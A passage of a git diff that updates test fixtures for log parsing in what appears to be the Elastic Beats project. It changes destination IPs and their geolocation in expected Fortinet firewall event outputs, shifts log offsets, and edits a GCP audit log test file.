+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 443,
 "event.action": "passthrough",
 "event.category": [
@@ -121,10 +123,10 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "notice",
- "log.offset": 707,
+ "log.offset": 712,
 "message": "URL belongs to an allowed category in policy",
 "network.bytes": 10357,
- "network.community_id": "1:6x4JdfgMVssswnIG5C8mkIbszLU=",
+ "network.community_id": "1:yxvV3EkgwHQGXl2k7O++IeunEHY=",
 "network.direction": "outbound",
 "network.iana_number": "6",
 "network.protocol": "https",
@@ -138,8 +140,8 @@
 "observer.type": "firewall",
 "observer.vendor": "Fortinet",
 "related.ip": [
- "192.168.2.1",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.1"
 ],
 "related.user": [
 "elasticuser"
@@ -163,14 +165,15 @@
 },
 {
 "@timestamp": "2020-04-23T13:17:35.000-04:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 443,
 "event.action": "pass",
 "event.category": [
@@ -201,10 +204,10 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "information",
- "log.offset": 1409,
+ "log.offset": 1419,
 "message": "Web.Client: HTTPS.BROWSER,",
 "network.application": "HTTPS.BROWSER",
- "network.community_id": "1:jz8Ul9WJmuEeHGbclqOri0hlDwI=",
+ "network.community_id": "1:6K2acy3gCzfHsHQdmN+K1fyKqO4=",
 "network.direction": "outbound",
 "network.iana_number": "6",
 "network.protocol": "ssl",
@@ -218,8 +221,8 @@
 "observer.type": "firewall",
 "observer.vendor": "Fortinet",
 "related.ip": [
- "192.168.2.1",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.1"
 ],
 "related.user": [
 "elasticuser"
@@ -243,14 +246,15 @@
 },
 {
 "@timestamp": "2020-04-23T13:17:35.000-04:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 443,
 "event.action": "pass",
 "event.category": [
@@ -281,10 +285,10 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "information",
- "log.offset": 2112,
+ "log.offset": 2127,
 "message": "Web.Client: HTTPS.BROWSER,",
 "network.application": "HTTPS.BROWSER",
- "network.community_id": "1:jz8Ul9WJmuEeHGbclqOri0hlDwI=",
+ "network.community_id": "1:6K2acy3gCzfHsHQdmN+K1fyKqO4=",
 "network.direction": "outbound",
 "network.iana_number": "6",
 "network.protocol": "ssl",
@@ -298,8 +302,8 @@
 "observer.type": "firewall",
 "observer.vendor": "Fortinet",
 "related.ip": [
- "192.168.2.1",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.1"
 ],
 "related.user": [
 "elasticuser"
@@ -323,21 +327,22 @@
 },
 {
 "@timestamp": "2020-04-23T12:17:29.000-05:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 53,
 "dns.id": "2234",
 "dns.question.class": "IN",
 "dns.question.name": "elastic.example.com",
 "dns.question.type": "A",
 "dns.resolved_ip": [
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "event.action": "pass",
 "event.category": [
@@ -367,9 +372,9 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "notice",
- "log.offset": 2806,
+ "log.offset": 2826,
 "message": "Domain is monitored",
- "network.community_id": "1:TAkI/Dqjd84P0/IOYFsZ/dciGyk=",
+ "network.community_id": "1:CEgDbLCgjPBvzcMawzocROJhmOU=",
 "network.iana_number": "17",
 "network.transport": "udp",
 "network.type": "ipv4",
@@ -384,8 +389,8 @@
 "elastic.example.com"
 ],
 "related.ip": [
- "192.168.2.1",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.1"
 ],
 "rule.category": "Web-based Email",
 "rule.id": "26",
@@ -400,22 +405,23 @@
 },
 {
 "@timestamp": "2020-04-23T12:17:29.000-05:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 53,
 "dns.id": "2234",
 "dns.question.class": "IN",
 "dns.question.name": "elastic.example.com",
 "dns.question.type": "A",
 "dns.resolved_ip": [
- "8.8.4.4",
- "8.8.8.8"
+ "175.16.199.1",
+ "8.8.4.4"
 ],
 "event.action": "pass",
 "event.category": [
@@ -445,9 +451,9 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "notice",
- "log.offset": 3356,
+ "log.offset": 3386,
 "message": "Domain is monitored",
- "network.community_id": "1:TAkI/Dqjd84P0/IOYFsZ/dciGyk=",
+ "network.community_id": "1:CEgDbLCgjPBvzcMawzocROJhmOU=",
 "network.iana_number": "17",
 "network.transport": "udp",
 "network.type": "ipv4",
@@ -462,9 +468,9 @@
 "elastic.example.com"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.2.1",
- "8.8.4.4",
- "8.8.8.8"
+ "8.8.4.4"
 ],
 "rule.category": "Web-based Email",
 "rule.id": "26",
@@ -479,14 +485,15 @@
 },
 {
 "@timestamp": "2020-04-23T12:17:11.000-05:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 443,
 "event.action": "pass",
 "event.category": [
@@ -517,10 +524,10 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "information",
- "log.offset": 3915,
+ "log.offset": 3955,
 "message": "Web.Client: HTTPS.BROWSER,",
 "network.application": "HTTPS.BROWSER",
- "network.community_id": "1:SnL1O7SJ70dFEAbmKNOL/cs7Yis=",
+ "network.community_id": "1:5KZi+brtHoTwzshPHYC6iIQcAIE=",
 "network.direction": "outbound",
 "network.iana_number": "6",
 "network.protocol": "ssl",
@@ -534,8 +541,8 @@
 "observer.type": "firewall",
 "observer.vendor": "Fortinet",
 "related.ip": [
- "192.168.2.1",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.1"
 ],
 "related.user": [
 "elasticuser"
@@ -558,21 +565,22 @@
 },
 {
 "@timestamp": "2020-04-23T12:17:04.000-05:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 53,
 "dns.id": "2352",
 "dns.question.class": "IN",
 "dns.question.name": "elastic.co",
 "dns.question.type": "A",
 "dns.resolved_ip": [
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "event.action": "pass",
 "event.category": [
@@ -602,9 +610,9 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "notice",
- "log.offset": 4595,
+ "log.offset": 4640,
 "message": "Domain is monitored",
- "network.community_id": "1:oi4FzZ6cP1JOcUzJW8FLs4MB4BM=",
+ "network.community_id": "1:kD75mqzsTS7oiRllEEF3faHh2ic=",
 "network.iana_number": "17",
 "network.transport": "udp",
 "network.type": "ipv4",
@@ -619,8 +627,8 @@
 "elastic.co"
 ],
 "related.ip": [
- "192.168.2.1",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.1"
 ],
 "rule.category": "Remote Access",
 "rule.id": "26",
@@ -635,14 +643,15 @@
 },
 {
 "@timestamp": "2020-04-23T12:17:12.000-05:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 53,
 "dns.id": "235",
 "dns.question.class": "IN",
@@ -671,8 +680,8 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "information",
- "log.offset": 5139,
- "network.community_id": "1:2iITe7baBXn6W2kcSCMlLR6YGNw=",
+ "log.offset": 5194,
+ "network.community_id": "1:r3fHI3hh+39DMVJua+CV3LAi34M=",
 "network.iana_number": "17",
 "network.transport": "udp",
 "network.type": "ipv4",
@@ -687,8 +696,8 @@
 "elastic.co"
 ],
 "related.ip": [
- "192.168.2.1",
- "8.8.8.8"
+ "175.16.199.1",
+ "192.168.2.1"
 ],
 "rule.id": "26",
 "rule.ruleset": "elastictest",
@@ -702,13 +711,6 @@
 },
 {
 "@timestamp": "2020-04-23T13:15:18.000-04:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "8.8.4.4",
 "destination.port": 443,
 "event.action": "passthrough",
@@ -737,7 +739,7 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "notice",
- "log.offset": 5598,
+ "log.offset": 5658,
 "message": "Server certificate passed",
 "network.community_id": "1:DPYPEQ6CL+DsivLJV6otkkVV6S8=",
 "network.iana_number": "6",
@@ -772,13 +774,6 @@
 },
 {
 "@timestamp": "2019-05-15T18:03:36.000-02:00",
- "destination.as.number": 41690,
- "destination.as.organization.name": "Dailymotion S.A.",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "FR",
- "destination.geo.country_name": "France",
- "destination.geo.location.lat": 48.8582,
- "destination.geo.location.lon": 2.3387,
 "destination.ip": "195.8.215.136",
 "destination.port": 443,
 "event.action": "pass",
@@ -809,7 +804,7 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "information",
- "log.offset": 6128,
+ "log.offset": 6188,
 "message": "Web.Client: HTTPS.BROWSER,",
 "network.application": "HTTPS.BROWSER",
 "network.community_id": "1:IOM2CCpAacVSdldWr1f2al8LJv4=",
@@ -881,7 +876,7 @@
 "fortinet.firewall.virusid": "2172",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 6788,
+ "log.offset": 6848,
 "message": "File is infected.",
 "network.community_id": "1:mS2/WPDX46+WauGLEZvCIQ/IKK0=",
 "network.direction": "inbound",
@@ -920,17 +915,7 @@
 },
 {
 "@timestamp": "2019-05-13T16:29:45.000-02:00",
- "destination.as.number": 42831,
- "destination.as.organization.name": "UK Dedicated Servers Limited",
 "destination.bytes": 0,
- "destination.geo.city_name": "Coventry",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "GB",
- "destination.geo.country_name": "United Kingdom",
- "destination.geo.location.lat": 52.382,
- "destination.geo.location.lon": -1.5874,
- "destination.geo.region_iso_code": "GB-COV",
- "destination.geo.region_name": "Coventry",
 "destination.ip": "185.244.31.158",
 "destination.port": 80,
 "event.action": "blocked",
@@ -962,7 +947,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 7596,
+ "log.offset": 7656,
 "message": "URL belongs to a denied category in policy",
 "network.bytes": 84,
 "network.community_id": "1:6Q3s77giRtaDlbjtG7Qfum6LzEk=",
@@ -1034,7 +1019,7 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 8243,
+ "log.offset": 8303,
 "message": "applications3: Adobe.Flash.newfunction.Handling.Code.Execution,",
 "network.community_id": "1:h1lO9dsjUlBQibNPDwk2LSH5uV4=",
 "network.direction": "inbound",
@@ -1101,7 +1086,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 8980,
+ "log.offset": 9040,
 "message": "anomaly: icmp_flood, 51 > threshold 50",
 "network.community_id": "1:/EwPCnPnhunCBJc8C73Iy8WlrhM=",
 "network.iana_number": "1",
@@ -1126,16 +1111,6 @@
 },
 {
 "@timestamp": "2019-05-15T17:45:30.000-02:00",
- "destination.as.number": 16509,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.216.177.83",
 "destination.port": 443,
 "event.action": "block",
@@ -1173,7 +1148,7 @@
 "fortinet.firewall.vd": "root",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 9581,
+ "log.offset": 9641,
 "network.community_id": "1:J2etn+6EN21BXHPPJZQeRpj+C3k=",
 "network.direction": "inbound",
 "network.iana_number": "6",
@@ -1236,7 +1211,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 10337,
+ "log.offset": 10397,
 "network.community_id": "1:EfgLxImMmBMDbP6vbTV8jZe5r64=",
 "network.direction": "outbound",
 "network.iana_number": "6",
@@ -1263,15 +1238,6 @@
 },
 {
 "@timestamp": "2019-03-28T10:44:53.000-02:00",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 38.6583,
- "destination.geo.location.lon": -77.2481,
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "104.154.89.105",
 "destination.port": 443,
 "event.action": "blocked",
@@ -1298,7 +1264,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 10760,
+ "log.offset": 10820,
 "message": "Server certificate blocked",
 "network.community_id": "1:3JAdUt0lSMifcZEPoVJn1SC8tdE=",
 "network.iana_number": "6",
@@ -1351,7 +1317,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 11187,
+ "log.offset": 11247,
 "message": "Server certificate blocked",
 "network.community_id": "1:+CuXSKFw5mhoSjpYrUOYxAYOzaU=",
 "network.iana_number": "6",
@@ -1404,7 +1370,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 11615,
+ "log.offset": 11675,
 "message": "Server certificate blocked",
 "network.community_id": "1:xeLbgVy2CNJ3q/bxUWxBBt6cGKM=",
 "network.iana_number": "6",
@@ -1457,7 +1423,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 12037,
+ "log.offset": 12097,
 "message": "Connection is blocked due to unsupported SSL traffic",
 "network.community_id": "1:PohXhOT4cmeI1agRXluSxRuXkvM=",
 "network.iana_number": "6",
@@ -1511,7 +1477,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 12521,
+ "log.offset": 12581,
 "message": "Server certificate blocked",
 "network.community_id": "1:gg6I8tZchtWCopsLdNDN7E84ZbU=",
 "network.iana_number": "6",
@@ -1565,7 +1531,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 12952,
+ "log.offset": 13012,
 "message": "Certificate blacklisted",
 "network.community_id": "1:/tDtPynm8PUjA7+AXhG5maLXczU=",
 "network.iana_number": "6",
@@ -1592,16 +1558,6 @@
 },
 {
 "@timestamp": "2019-03-28T11:06:05.000-02:00",
- "destination.as.number": 16509,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "San Jose",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.3388,
- "destination.geo.location.lon": -121.8914,
- "destination.geo.region_iso_code": "US-CA",
- "destination.geo.region_name": "California",
 "destination.ip": "50.18.221.132",
 "destination.port": 443,
 "event.action": "exempt",
@@ -1628,7 +1584,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "notice",
- "log.offset": 13414,
+ "log.offset": 13474,
 "message": "SSL connection exempted",
 "network.community_id": "1:o4PokgFFuw7PzgWghlu55zAVFAQ=",
 "network.iana_number": "6",
@@ -1681,7 +1637,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "notice",
- "log.offset": 13830,
+ "log.offset": 13890,
 "message": "SSL connection exempted",
 "network.community_id": "1:q6lEK+V8YAiHWchN6gVt5i1lbm8=",
 "network.iana_number": "6",
@@ -1708,16 +1664,6 @@
 },
 {
 "@timestamp": "2019-03-28T11:10:55.000-02:00",
- "destination.as.number": 16509,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "San Jose",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.3388,
- "destination.geo.location.lon": -121.8914,
- "destination.geo.region_iso_code": "US-CA",
- "destination.geo.region_name": "California",
 "destination.ip": "50.18.221.132",
 "destination.port": 443,
 "event.action": "exempt",
@@ -1744,7 +1690,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "notice",
- "log.offset": 14241,
+ "log.offset": 14301,
 "message": "SSL connection exempted",
 "network.community_id": "1:fc1FAipY32n2Km+Fczx/L3cxBPE=",
 "network.iana_number": "6",
@@ -1799,7 +1745,7 @@
 "fortinet.firewall.vd": "vdom1",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 14656,
+ "log.offset": 14716,
 "message": "File was blocked by file filter.",
 "network.direction": "inbound",
 "network.iana_number": "16",
@@ -1826,13 +1772,6 @@
 },
 {
 "@timestamp": "2021-03-30T14:04:58.000+09:00",
- "destination.as.number": 135161,
- "destination.as.organization.name": "GMO-Z com NetDesign Holdings Co., Ltd.",
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "SG",
- "destination.geo.country_name": "Singapore",
- "destination.geo.location.lat": 1.3667,
- "destination.geo.location.lon": 103.8,
 "destination.ip": "150.95.25.17",
 "destination.port": 80,
 "event.action": "blocked",
@@ -1869,7 +1808,7 @@
 "fortinet.firewall.virusid": "2172",
 "input.type": "log",
 "log.level": "warning",
- "log.offset": 15165,
+ "log.offset": 15225,
 "message": "File is infected.",
 "network.community_id": "1:YYsQyWVI+C/2EYyLGlhTY/RydM8=",
 "network.direction": "inbound",
diff --git a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log
index df986980c71b..ab4b30aca34d 100644
--- a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log
+++ b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log
@@ -3,8 +3,8 @@ {"insertId":"yonau2dg2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"response":{"@type":"core.k8s.io/v1.Status","apiVersion":"v1","details":{"group":"batch","kind":"jobs","name":"gsuite-exporter-1589294700","uid":"2beff34a-945f-11ea-bacf-42010a80007f"},"kind":"Status","metadata":{},"status":"Success"},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} 
{"insertId":"yonau3dc2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com","status":{"code":7,"message":"PERMISSION_DENIED"}},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} {"insertId":"87efd529-6349-45d2-b905-fc607e6c5d3b","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"cert-manager-webhook:auth-delegator\" of ClusterRole \"system:auth-delegator\" to ServiceAccount 
\"cert-manager-webhook/cert-manager\""},"logName":"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"5555555-6349-45d2-b905-fc607e6c5d3b","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:serviceaccount:cert-manager:cert-manager-webhook"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","resource":"authorization.k8s.io/v1beta1/subjectaccessreviews"}],"methodName":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","request":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":false}},"requestMetadata":{"callerIp":"10.11.12.13","callerSuppliedUserAgent":"webhook/v0.0.0 (linux/amd64) kubernetes/$Format"},"resourceName":"authorization.k8s.io/v1beta1/subjectaccessreviews","response":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":true,"reason":"RBAC: allowed by ClusterRoleBinding \"system:discovery\" of ClusterRole \"system:discovery\" to Group 
\"system:authenticated\""}},"serviceName":"k8s.io","status":{"code":0}},"receiveTimestamp":"2020-08-05T21:07:32.157698684Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2020-08-05T21:07:30.974750Z"} -{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"1.2.3.4","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"} 